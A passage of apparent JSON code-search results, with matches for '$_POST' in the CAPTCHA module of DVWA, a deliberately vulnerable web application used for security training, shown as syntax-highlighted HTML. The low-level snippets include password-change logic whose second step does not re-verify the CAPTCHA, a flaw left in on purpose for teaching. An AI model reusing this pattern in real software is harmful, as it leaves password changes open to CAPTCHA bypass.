class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">33:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">34:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
"line": 29,
"start": 24,
"end": 35,
"severity": "unknown",
"note": ""
},
{
"id": 107,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">33:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">34:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">35:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 30,
"start": 25,
"end": 36,
"severity": "unknown",
"note": ""
},
{
"id": 115,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 116,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 117,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 118,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 119,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 120,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">40:</span> \t\t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">41:</span> \t\t}\n<span class=\"line-number\">42:</span> \t}\n<span class=\"line-number\">43:</span> }\n<span class=\"line-number\">44:</span> \n<span class=\"highlight\"><span class=\"line-number\">45:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">46:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">47:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">50:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 45,
"start": 40,
"end": 51,
"severity": "unknown",
"note": ""
},
{
"id": 121,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">45:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">46:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">47:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">50:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
"line": 50,
"start": 45,
"end": 56,
"severity": "unknown",
"note": ""
},
{
"id": 122,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">46:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">47:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">50:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 51,
"start": 46,
"end": 57,
"severity": "unknown",
"note": ""
},
{
"id": 127,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 128,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 129,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> 